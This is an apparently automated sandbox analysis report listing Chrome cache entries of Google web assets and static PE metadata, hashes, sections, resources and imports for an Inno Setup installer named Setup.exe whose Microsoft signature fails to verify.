Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1395)
Category:	downloaded
Size (bytes):	117446
Entropy (8bit):	5.490775275046353
Encrypted:	false
SSDEEP:	3072:T2yvefrtJUEgK3Cvw3wWs/ZuTZVL/G1kL:T2y4tJbDK0L/G1kL
MD5:	942EA4F96889BAE7D3C59C0724AB2208
SHA1:	033DDF473319500621D8EBB6961C4278E27222A7
SHA-256:	F59F7F32422E311462A6A6307D90CA75FE87FA11E6D481534A6F28BFCCF63B03
SHA-512:	C3F27662D08AA00ECBC910C39F6429C2F4CBC7CB5FC9083F63390047BACAF8CD7A83C3D6BBE7718F699DAE2ADA486F9E0CAED59BC3043491EECD9734EC32D92F
Malicious:	false
URL:	"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0"
Preview:	gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([]);.var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);ma=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)return a;var b

Chrome Cache Entry: 74

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 75

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	132739
Entropy (8bit):	5.436864018704742
Encrypted:	false
SSDEEP:	3072:f5kJQ7O4N5dTm+syHEt4W3XdQ4Q6JuSr/nUW2i6o:fwQ7HTt/sHdQ4Q6JDfUW8o
MD5:	97659232FE5C87317172DAF6B1C94BF2
SHA1:	E78C431F6D81A51E5EFBB70B3D7FCC1E652BF8C1
SHA-256:	E325A7BA0968E9F960B70D47F75B3B603C60703F72BCE8E4B29990A76BF2CB7D
SHA-512:	10F82012BC763564C3FA5BB6BDF58B596E2C664BD896D363A5E5D7F8D161CBB5C2599804D6A3088399261FD25E002C3B99D59EE86CEFEDB64D1F6DF802AE7E2C
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 76

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2410)
Category:	downloaded
Size (bytes):	175897
Entropy (8bit):	5.549876394125764
Encrypted:	false
SSDEEP:	3072:t0PuJ7UV1+ApsOC3Ocr4ONnv4clQfOQMmzIWrBQoSpFMgDuq1HBGANYmYALJQIfr:t0PuJQ+ApsOOFZNnvFlqOQMmsWrBQoSd
MD5:	2368B9A3E1E7C13C00884BE7FA1F0DFC
SHA1:	8F88AD448B22177E2BDA0484648C23CA1D2AA09E
SHA-256:	577E04E2F3AB34D53B7F9D2F6DE45A4ECE86218BEC656B01DCAFF1BF6D218504
SHA-512:	105D51DE8FADDE21A134ACA185AA5C6D469B835B77BEBEC55A7E90C449F29FCC1F33DAF5D86AA98B3528722A8F533800F5146CCA600BC201712EBC9281730201
Malicious:	false
URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTu0yU9RTMfNNC-LVUmaaNKwIO136g"
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.Ui=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Vi=class extends _.Q{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Wi,Xi,aj,dj,cj,Zi,bj;Wi=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};Xi=function(){_.Ka()};aj=function(a,b){(_.Yi\|\|(_.Yi=new Zi)).set(a,b);(_.$i\|\|(_.$i=new Zi)).set(b,a)};dj=function(a){if(bj===void 0){const b=new cj([],{});bj=Array.prototype.concat.call([],b).length===1}bj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ej=function(a,b,c){a=_.rb(a,b,c);return Array.isArray(a)?a:_.Ac};._.fj=function(a,b){a=2&b?a\|2:a&-3;return(a\|32)&-2049};_.gj=function(a,b){a===0&&(a=_.fj(a,b));return a\|1};_.hj=function(a){return!!(2&a)&&!!(4&a)\|\|!!(2048&a)};_.ij=function(a,b,c){32&b&&c\|\|(a&=-33);return a};._.lj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ej(a,b,d);var k=h[_

Chrome Cache Entry: 77

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	downloaded
Size (bytes):	5162
Entropy (8bit):	5.3503139230837595
Encrypted:	false
SSDEEP:	96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
MD5:	7977D5A9F0D7D67DE08DECF635B4B519
SHA1:	4A66E5FC1143241897F407CEB5C08C36767726C1
SHA-256:	FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
SHA-512:	8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
Malicious:	false
URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
Preview:	.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 78

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
URL:	https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	0.8030740299766413
TrID:	Win32 Executable (generic) a (10002005/4) 98.88% Inno Setup installer (109748/4) 1.08% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Setup.exe
File size:	76'542'479 bytes
MD5:	f18fa7132a5eda29041fdd8ae85363db
SHA1:	4de6de8445b5dc6897461b684da74df7e9673f78
SHA256:	543c81da09d6669ddf5fbb2d6c3889d7dabfd166d3f726349c30a51c542a2f50
SHA512:	a61f193ea0e2bc13127b71756ebf90c98b09d8940105008eddce4f85adbb0c2f3adc526a2eebb6c81e6aca170d74dde974b0bf16df368906754c8177e3634beb
SSDEEP:	49152:Tdx4HDQNJL0VR6SgMt+k4RiP+RmXMjiINiMq95FoCVHNTQTEj3333wIPmXs4rTLa:4HDYsqiPRhINnq95FoCVB3333j+vm
TLSH:	1DF72926E3CC23A9F71716750A33B2D39937AF1023127CD752FD15498E2B4D81A3AA5B
File Content Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	0b1916161d151191

Static PE Info

General

Entrypoint:	0x6c5660
Entrypoint Section:	.itext
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6258476F [Thu Apr 14 16:10:23 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	8507116e3d0e7e02e36e7dc5b8aa1af8

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	15/12/2020 21:24:20 02/12/2021 21:24:20
Subject Chain	CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:	3
Thumbprint MD5:	4068B1B0494EFA79F5A751DCCA8111CD
Thumbprint SHA-1:	914A09C2E02C696AF394048BCB8D95449BCD5B9E
Thumbprint SHA-256:	4A838904E732A380E2856A9D6FEE926E5C57EB59336292AC5D9E47C9B2C1ED13
Serial:	33000003DFFB6AE3F427ECB6A30000000003DF

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
push ebx
push esi
push edi
mov eax, 006BA0FCh
call 00007FB6A504C16Ah
mov eax, dword ptr [006CEEC4h]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+00000188h]
push FFFFFFECh
push eax
call 00007FB6A5050505h
mov edx, dword ptr [006CEEC4h]
mov edx, dword ptr [edx]
mov edx, dword ptr [edx+00000188h]
and eax, FFFFFF7Fh
push eax
push FFFFFFECh
push edx
call 00007FB6A50504F1h
xor eax, eax
push ebp
push 006C56F1h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
push 00000001h
call 00007FB6A504F84Ch
call 00007FB6A52F53DBh
mov eax, dword ptr [006B9D24h]
push eax
push 006B9DBCh
mov eax, dword ptr [006CEEC4h]
mov eax, dword ptr [eax]
call 00007FB6A51F3CB8h
mov eax, 006B499Ch
mov edx, dword ptr [006CED3Ch]
mov dword ptr [edx], eax
call 00007FB6A52F5422h
xor eax, eax
pop edx
pop ecx
pop ecx
mov dword ptr fs:[eax], edx
jmp 00007FB6A5300C4Bh
jmp 00007FB6A5044A6Fh
call 00007FB6A52F516Ah
mov eax, 00000001h
call 00007FB6A5045558h
call 00007FB6A5044EB3h
mov eax, dword ptr [006CEEC4h]
mov eax, dword ptr [eax]
mov edx, 006C5884h
call 00007FB6A51F3782h
push 00000005h
mov eax, dword ptr [006CEEC4h]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+00000188h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x2dd000	0x97	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2d8000	0x39ba	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2e0000	0xdda00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x48fd03f	0x21d0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x2df000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2d89f0	0x8c4	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x2dc000	0xbde	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2c1610	0x2c1800	dae0b06841f0c93b7de0b99e55fb3be3	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x2c3000	0x2890	0x2a00	16393e4e7bec78a4bcae5ae55f8f292c	False	0.5015811011904762	data	6.1019414475775875	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x2c6000	0x91e0	0x9200	042a801fd25918b12ad83daff139f4d4	False	0.5827536386986302	data	6.263961718314003	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x2d0000	0x7900	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x2d8000	0x39ba	0x3a00	03081ba482d19e9b1cd93a470ca85644	False	0.3356007543103448	data	5.288947298357307	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0x2dc000	0xbde	0xc00	c332bb295f400e296d2b360ecd996bd0	False	0.3502604166666667	data	4.388049073777676	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x2dd000	0x97	0x200	c2fbf23dade9282f5d6f41b22deec17c	False	0.25	data	1.851215117761671	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0x2de000	0x4c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x2df000	0x5d	0x200	b334cafcb8aaba886c7aff7f26845b05	False	0.189453125	data	1.3626936858228273	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x2e0000	0xdda00	0xdda00	88b5e0fc2fdb080a46f261ffd6c35a4a	False	0.558020921460801	data	7.336237770749843	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x2e10b0	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x2e11e4	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x2e1318	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x2e144c	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x2e1580	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x2e16b4	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x2e17e8	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_ICON	0x2e191c	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.04227680680207841
RT_ICON	0x2e5b44	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.07157676348547717
RT_ICON	0x2e80ec	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.08794559099437148
RT_ICON	0x2e9194	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.11891828058573453
RT_ICON	0x2ed3bc	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.1578838174273859
RT_ICON	0x2ef964	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.010333018422295701
RT_ICON	0x2f3b8c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.026763485477178422
RT_ICON	0x2f6134	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.02626641651031895
RT_ICON	0x2f71dc	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.15806754221388367
RT_ICON	0x2f8284	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.27172131147540984
RT_ICON	0x2f8c0c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.350177304964539
RT_ICON	0x2f9074	0x3732	PNG image data, 256 x 256, 8-bit colormap, non-interlaced	English	United States	0.9632696390658174
RT_ICON	0x2fc7a8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688	English	United States	0.5783582089552238
RT_ICON	0x2fd650	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	English	United States	0.6678700361010831
RT_ICON	0x2fdef8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 672	English	United States	0.6716589861751152
RT_ICON	0x2fe5c0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	English	United States	0.4667630057803468
RT_ICON	0x2feb28	0xb96b	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9835464638591022
RT_ICON	0x30a494	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.6
RT_ICON	0x30ca3c	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.6887898686679175
RT_ICON	0x30dae4	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.5491803278688525
RT_ICON	0x30e46c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.3537234042553192
RT_STRING	0x30e8d4	0x210	data			0.3125
RT_STRING	0x30eae4	0x440	data			0.37683823529411764
RT_STRING	0x30ef24	0x2b4	data			0.45809248554913296
RT_STRING	0x30f1d8	0x214	data			0.4605263157894737
RT_STRING	0x30f3ec	0x3e4	data			0.3885542168674699
RT_STRING	0x30f7d0	0x3a0	data			0.4191810344827586
RT_STRING	0x30fb70	0x1ec	data			0.5609756097560976
RT_STRING	0x30fd5c	0xcc	data			0.6666666666666666
RT_STRING	0x30fe28	0x294	data			0.4681818181818182
RT_STRING	0x3100bc	0x3e8	data			0.372
RT_STRING	0x3104a4	0x488	data			0.41293103448275864
RT_STRING	0x31092c	0x418	data			0.28435114503816794
RT_STRING	0x310d44	0x370	data			0.4147727272727273
RT_STRING	0x3110b4	0x39c	data			0.41233766233766234
RT_STRING	0x311450	0x4a4	data			0.382996632996633
RT_STRING	0x3118f4	0x384	data			0.37333333333333335
RT_STRING	0x311c78	0x454	data			0.3935018050541516
RT_STRING	0x3120cc	0x210	data			0.39015151515151514
RT_STRING	0x3122dc	0xbc	data			0.6542553191489362
RT_STRING	0x312398	0x100	data			0.62890625
RT_STRING	0x312498	0x338	data			0.4223300970873786
RT_STRING	0x3127d0	0x3f0	data			0.34226190476190477
RT_STRING	0x312bc0	0x314	data			0.38578680203045684
RT_STRING	0x312ed4	0x2f8	data			0.38026315789473686
RT_RCDATA	0x3131cc	0x10	data			1.5
RT_RCDATA	0x3131dc	0x1800	PE32+ executable (console) x86-64, for MS Windows	English	United States	0.3924153645833333
RT_RCDATA	0x3149dc	0xb70	data			0.5358606557377049
RT_RCDATA	0x31554c	0x147	Delphi compiled form 'TMainForm'			0.746177370030581
RT_RCDATA	0x315694	0x480	Delphi compiled form 'TNewDiskForm'			0.5052083333333334
RT_RCDATA	0x315b14	0x400	Delphi compiled form 'TSelectFolderForm'			0.5087890625
RT_RCDATA	0x315f14	0x4b5	Delphi compiled form 'TSelectLanguageForm'			0.5004149377593361
RT_RCDATA	0x3163cc	0x7e3	Delphi compiled form 'TUninstallProgressForm'			0.40713224368499257
RT_RCDATA	0x316bb0	0x55c	Delphi compiled form 'TUninstSharedFileForm'			0.41690962099125367
RT_RCDATA	0x31710c	0x2ac9	Delphi compiled form 'TWizardForm'			0.19811923673879303
RT_GROUP_CURSOR	0x319bd8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x319bec	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x319c00	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x319c14	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x319c28	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x319c3c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x319c50	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x319c64	0x92	data	English	United States	0.6643835616438356
RT_GROUP_ICON	0x319cf8	0x30	data	English	United States	0.9375
RT_GROUP_ICON	0x319d28	0x22	data	English	United States	1.0588235294117647
RT_GROUP_ICON	0x319d4c	0x30	data	English	United States	0.9375
RT_GROUP_ICON	0x319d7c	0x30	data	English	United States	0.9583333333333334
RT_VERSION	0x319dac	0x514	data	English	United States	0.30846153846153845
RT_MANIFEST	0x31a2c0	0x765	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.39091389329107235

Imports

DLL	Import
mpr.dll	WNetEnumResourceW, WNetGetUniversalNameW, WNetGetConnectionW, WNetCloseEnum, WNetOpenEnumW
comdlg32.dll	GetSaveFileNameW, GetOpenFileNameW
comctl32.dll	FlatSB_SetScrollInfo, InitCommonControls, ImageList_DragMove, ImageList_Destroy, _TrackMouseEvent, ImageList_DragShowNolock, ImageList_Add, FlatSB_SetScrollProp, ImageList_GetDragImage, ImageList_Create, ImageList_EndDrag, ImageList_DrawEx, ImageList_SetImageCount, FlatSB_GetScrollPos, FlatSB_SetScrollPos, InitializeFlatSB, FlatSB_GetScrollInfo, ImageList_Write, ImageList_SetBkColor, ImageList_GetBkColor, ImageList_BeginDrag, ImageList_GetIcon, ImageList_GetImageCount, ImageList_DragEnter, ImageList_GetIconSize, ImageList_SetIconSize, ImageList_Read, ImageList_DragLeave, ImageList_Draw, ImageList_Remove
shell32.dll	SHBrowseForFolderW, SHGetMalloc, SHGetFileInfoW, SHChangeNotify, Shell_NotifyIconW, ShellExecuteW, SHGetPathFromIDListW, ShellExecuteExW
user32.dll	CopyImage, CreateWindowExW, GetMenuItemInfoW, SetMenuItemInfoW, DefFrameProcW, GetDCEx, GetMessageW, PeekMessageW, MonitorFromWindow, GetDlgCtrlID, ScrollWindowEx, SetTimer, WindowFromPoint, BeginPaint, RegisterClipboardFormatW, FrameRect, MapVirtualKeyW, OffsetRect, IsWindowUnicode, RegisterWindowMessageW, FillRect, GetMenuStringW, DispatchMessageW, SendMessageA, DefMDIChildProcW, EnumWindows, GetClassInfoW, GetSystemMenu, WaitForInputIdle, ShowOwnedPopups, GetScrollRange, GetScrollPos, SetScrollPos, GetActiveWindow, SetActiveWindow, DrawEdge, InflateRect, GetKeyboardLayoutList, OemToCharBuffA, LoadBitmapW, DrawFocusRect, EnumChildWindows, GetScrollBarInfo, SendNotifyMessageW, ReleaseCapture, UnhookWindowsHookEx, LoadCursorW, GetCapture, SetCapture, CreatePopupMenu, ScrollWindow, ShowCaret, GetMenuItemID, GetLastActivePopup, CharLowerBuffW, GetSystemMetrics, SetWindowLongW, PostMessageW, DrawMenuBar, SetParent, IsZoomed, 